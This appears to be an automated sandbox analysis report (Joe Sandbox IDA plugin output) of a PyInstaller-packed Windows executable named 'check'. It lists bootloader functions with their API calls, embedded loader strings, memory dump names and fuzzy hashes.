GetProcAddress.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D9235840
GetLastError.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D9235852
GetProcAddress.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D9235889
GetLastError.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D923589B
GetProcAddress.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D92358B4
GetLastError.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D92358C6
GetProcAddress.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D92358DF
GetLastError.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D92358F1
GetProcAddress.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D923590D
GetLastError.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D923591F
GetProcAddress.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D923593B
GetLastError.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D923594D
GetProcAddress.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D9235969
GetLastError.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D923597B
GetProcAddress.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D9235997
GetLastError.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D92359A9
GetProcAddress.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D92359C5
GetLastError.KERNEL32(?,00007FF6D92364CF,?,00007FF6D923336E), ref: 00007FF6D92359D7

Strings

PyMem_RawFree, xrefs: 00007FF6D9235C9B, 00007FF6D9235CBD
PyErr_Print, xrefs: 00007FF6D9235B59, 00007FF6D9235B7B
Failed to get address for %hs, xrefs: 00007FF6D9235861
PyConfig_Read, xrefs: 00007FF6D92359E9, 00007FF6D9235A0B
PyConfig_InitIsolatedConfig, xrefs: 00007FF6D92359BB, 00007FF6D92359DD
PyStatus_Exception, xrefs: 00007FF6D9235E39, 00007FF6D9235E5B
PyConfig_Clear, xrefs: 00007FF6D923598D, 00007FF6D92359AF
PyUnicode_FromFormat, xrefs: 00007FF6D9235F4D, 00007FF6D9235F6F
PyUnicode_DecodeFSDefault, xrefs: 00007FF6D9235F1F, 00007FF6D9235F41
Py_InitializeFromConfig, xrefs: 00007FF6D9235903, 00007FF6D9235925
Py_PreInitialize, xrefs: 00007FF6D923595F, 00007FF6D9235981
PyErr_Occurred, xrefs: 00007FF6D9235B2B, 00007FF6D9235B4D
PyObject_GetAttrString, xrefs: 00007FF6D9235D53, 00007FF6D9235D75
GetProcAddress, xrefs: 00007FF6D9235868
Py_IsInitialized, xrefs: 00007FF6D9235931, 00007FF6D9235953
Py_Finalize, xrefs: 00007FF6D92358D5, 00007FF6D92358F7
PyErr_Clear, xrefs: 00007FF6D9235AA1, 00007FF6D9235AC3
PyConfig_SetWideStringList, xrefs: 00007FF6D9235A73, 00007FF6D9235A95
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6D9235DDD, 00007FF6D9235DFF
PyModule_GetDict, xrefs: 00007FF6D9235CC9, 00007FF6D9235CEB
PyUnicode_Join, xrefs: 00007FF6D9235FA9, 00007FF6D9235FCB
Py_DecRef, xrefs: 00007FF6D9235836, 00007FF6D9235858
PyObject_CallFunction, xrefs: 00007FF6D9235CF7, 00007FF6D9235D19
PyUnicode_FromString, xrefs: 00007FF6D9235F7B, 00007FF6D9235F9D
PyObject_Str, xrefs: 00007FF6D9235DAF, 00007FF6D9235DD1
PyConfig_SetBytesString, xrefs: 00007FF6D9235A17, 00007FF6D9235A39
PyUnicode_AsUTF8, xrefs: 00007FF6D9235EC3, 00007FF6D9235EE5
PyUnicode_Decode, xrefs: 00007FF6D9235EF1, 00007FF6D9235F13
PySys_SetObject, xrefs: 00007FF6D9235E95, 00007FF6D9235EB7
PyImport_ExecCodeModule, xrefs: 00007FF6D9235C11, 00007FF6D9235C33
Py_ExitStatusException, xrefs: 00007FF6D92358AA, 00007FF6D92358CC
PyObject_CallFunctionObjArgs, xrefs: 00007FF6D9235D25, 00007FF6D9235D47
PyImport_AddModule, xrefs: 00007FF6D9235BE3, 00007FF6D9235C05
PySys_GetObject, xrefs: 00007FF6D9235E67, 00007FF6D9235E89
Py_DecodeLocale, xrefs: 00007FF6D923587F, 00007FF6D92358A1
PyEval_EvalCode, xrefs: 00007FF6D9235BB5, 00007FF6D9235BD7
PyErr_Restore, xrefs: 00007FF6D9235B87, 00007FF6D9235BA9
PyMarshal_ReadObjectFromString, xrefs: 00007FF6D9235C6D, 00007FF6D9235C8F
PyImport_ImportModule, xrefs: 00007FF6D9235C3F, 00007FF6D9235C61
PyErr_NormalizeException, xrefs: 00007FF6D9235AFD, 00007FF6D9235B1F
PyRun_SimpleStringFlags, xrefs: 00007FF6D9235E0B, 00007FF6D9235E2D
PyObject_SetAttrString, xrefs: 00007FF6D9235D81, 00007FF6D9235DA3
PyErr_Fetch, xrefs: 00007FF6D9235ACF, 00007FF6D9235AF1
PyUnicode_Replace, xrefs: 00007FF6D9235FD7, 00007FF6D9235FF9
PyConfig_SetString, xrefs: 00007FF6D9235A45, 00007FF6D9235A67

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: 5dd7e9dc9f0c097d7e652ad492644bc28821568336ea93f5b327c61c184e4d44
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: 9322B664D2EB0792FA95EF66AE149BD23A1AF04755F44143BC41E82269FF3CB5B8C340

Function 00007FF6D92381D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D9239390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6D92345F4,00000000,00007FF6D9231985), ref: 00007FF6D92393C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6D92386B7,?,?,00000000,00007FF6D9233CBB), ref: 00007FF6D923822C

Part of subcall function 00007FF6D9232810: MessageBoxW.USER32 ref: 00007FF6D92328EA

Strings

LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6D9238240
%.*s, xrefs: 00007FF6D923830C
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6D92382D9
\, xrefs: 00007FF6D9238261
CreateDirectory, xrefs: 00007FF6D923837C
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF6D9238373
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF6D923829D
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6D9238203

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction ID: e3a59189f98ccc6817193b5ab098f96c2feca98de018f328f53a5b3e70c400ca
Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction Fuzzy Hash: 41519511A3DA8281FB50DF75EA512BE62A0AF94780F44453BDA0EC7AD9EE3CE5258740

Function 00007FF6D9232180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6D92321AB
SelectObject.GDI32 ref: 00007FF6D92321F2
DrawTextW.USER32 ref: 00007FF6D9232215
SelectObject.GDI32 ref: 00007FF6D923222B
ReleaseDC.USER32 ref: 00007FF6D923223B
MoveWindow.USER32 ref: 00007FF6D923228B
MoveWindow.USER32 ref: 00007FF6D92322CB
MoveWindow.USER32 ref: 00007FF6D923231E
MoveWindow.USER32 ref: 00007FF6D9232366

Strings

P%, xrefs: 00007FF6D92321FF

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: b882c76512c64388bc89556e9d03c7fe0702e95d48fe1f6bc0f34b009b52580a
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 5D51C726618BA186E6349F36E4181BEB7A1FB98B61F004126EFDE83694DF3CD055DB10

Function 00007FF6D92380C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6D92380FF
GetWindowLongPtrW.USER32 ref: 00007FF6D923817F
ShutdownBlockReasonCreate.USER32 ref: 00007FF6D9238192
GetLastError.KERNEL32 ref: 00007FF6D923819C
SetWindowLongPtrW.USER32 ref: 00007FF6D92381B3

Strings

Needs to remove its temporary files., xrefs: 00007FF6D9238185

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: 32e91a242572ddb2f1392068ba0b97738cd5fd179fb8e68db6382ffb2b7deb85
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: CF21B721B29A4282F7918FBAEE5417D6250FF88B90F584236DE5DC73D8DE3CD5A08300

Function 00007FF6D9246290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92462D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92466C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D924695C

Strings

-, xrefs: 00007FF6D9246369
p, xrefs: 00007FF6D92463FD
f, xrefs: 00007FF6D92463F5
:, xrefs: 00007FF6D924648C
p, xrefs: 00007FF6D9246385

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 9fd8b06868113d22ab96aeafc455ea0306440d6f79e373f3e3548e2bf7d8b64c
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 8712B371E2C24386FB205E14D35427F7692FB68B54F844137E68986AC8DF3CE5A48F45

Function 00007FF6D9240FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9241008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92413D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D924166F

Strings

f, xrefs: 00007FF6D9241255
p, xrefs: 00007FF6D9241112
f, xrefs: 00007FF6D92410A0
f, xrefs: 00007FF6D924110A
p, xrefs: 00007FF6D92410AD

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 8cdb95e4b9d3e4d7aeebb94492003d434e7a5ba70ddfb179a0129808b674727a
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 25129561E2C54386FB249F14E2462BD76A1FB78754F844033E69AC6AC5DF7CE4A08F50

Function 00007FF6D9231050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF6D9231098
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6D92310CC
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6D9231108
fread, xrefs: 00007FF6D92311FD
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6D92311F6
malloc, xrefs: 00007FF6D923110F
fseek, xrefs: 00007FF6D92310D3

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: bb53b9f83130c86f90c73192f8f8ea576b0e1637b53f6056db95b778128c6f12
Instruction ID: d76eb53a415eeb93af0e9c3edd7637d216387901647f64c77c4536783029f23b
Opcode Fuzzy Hash: bb53b9f83130c86f90c73192f8f8ea576b0e1637b53f6056db95b778128c6f12
Instruction Fuzzy Hash: 32419221B3865282FA10DF22AA056BD6390FF55BC4F544437ED8D8779ADE3CE522CB40

Function 00007FF6D9231470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF6D923149F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6D92314DE
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6D9231518
fread, xrefs: 00007FF6D92315E6
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6D92315DF
malloc, xrefs: 00007FF6D923151F
fseek, xrefs: 00007FF6D92314E5

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 0e986b4e5c265948de3afc9e4e2e10f8185b4b3ab4291cce073a7edd1c97f69a
Instruction ID: c9ed7981ba855510da95719c5d49c91623534495b541f70b5cb420b8bb6f7fc7
Opcode Fuzzy Hash: 0e986b4e5c265948de3afc9e4e2e10f8185b4b3ab4291cce073a7edd1c97f69a
Instruction Fuzzy Hash: 4141AE22A2864286FB10DF32DA015BD63A0FF59784F844537ED4D87B9ADE3CE566CB00

Function 00007FF6D923EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6D923EA65

Part of subcall function 00007FF6D923F9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF6D923F9FF
Part of subcall function 00007FF6D923F9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6D923FA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6D923EB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6D923ED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6D923EE98

Strings

csm, xrefs: 00007FF6D923EAE6
csm, xrefs: 00007FF6D923EA7F
csm, xrefs: 00007FF6D923EB60

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: c1402ece55459c077c3749ec002e783af92d19c90dc2b11a3fe2655e8b81b7ac
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction Fuzzy Hash: A5D18232A287418AFB209F75D6403AD77A0FB557A8F10013AEE4D97B95DF38E4A9C700

Function 00007FF6D9232C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9233706,?,00007FF6D9233804), ref: 00007FF6D9232C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9233706,?,00007FF6D9233804), ref: 00007FF6D9232D63
MessageBoxW.USER32 ref: 00007FF6D9232D99

Strings

%ls: , xrefs: 00007FF6D9232D22
<FormatMessageW failed.>, xrefs: 00007FF6D9232D70
Error, xrefs: 00007FF6D9232D8C
[PYI-%d:ERROR] , xrefs: 00007FF6D9232CA6

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: c422c263a7e5d20c8c55c7d50509d21500552f7462f2289fdd747c768aedd313
Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: 4231D622B18A4142F620AF25AA102BE66A1BF88B98F414137EF4DD7759DF3CD526C700

Function 00007FF6D923DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6D923DF7A,?,?,?,00007FF6D923DC6C,?,?,?,00007FF6D923D869), ref: 00007FF6D923DD4D
GetLastError.KERNEL32(?,?,?,00007FF6D923DF7A,?,?,?,00007FF6D923DC6C,?,?,?,00007FF6D923D869), ref: 00007FF6D923DD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF6D923DF7A,?,?,?,00007FF6D923DC6C,?,?,?,00007FF6D923D869), ref: 00007FF6D923DD85
FreeLibrary.KERNEL32(?,?,?,00007FF6D923DF7A,?,?,?,00007FF6D923DC6C,?,?,?,00007FF6D923D869), ref: 00007FF6D923DDF3
GetProcAddress.KERNEL32(?,?,?,00007FF6D923DF7A,?,?,?,00007FF6D923DC6C,?,?,?,00007FF6D923D869), ref: 00007FF6D923DDFF

Strings

api-ms-, xrefs: 00007FF6D923DD6D

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: 1b241bf13153d192e5d8808abc8dba32b910955e2d7ed6fd15624b22228ce934
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: 3D31E622B2A70691FE51AF229A006BD3394FF48BA0F49463BDD1D87784DF3DE4648310

Function 00007FF6D9236360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

ucrtbase.dll, xrefs: 00007FF6D92363DD
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6D92363C7
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF6D9236456
LoadLibrary, xrefs: 00007FF6D92364AE
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6D9236407
Failed to load Python DLL '%ls'., xrefs: 00007FF6D92364A7

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
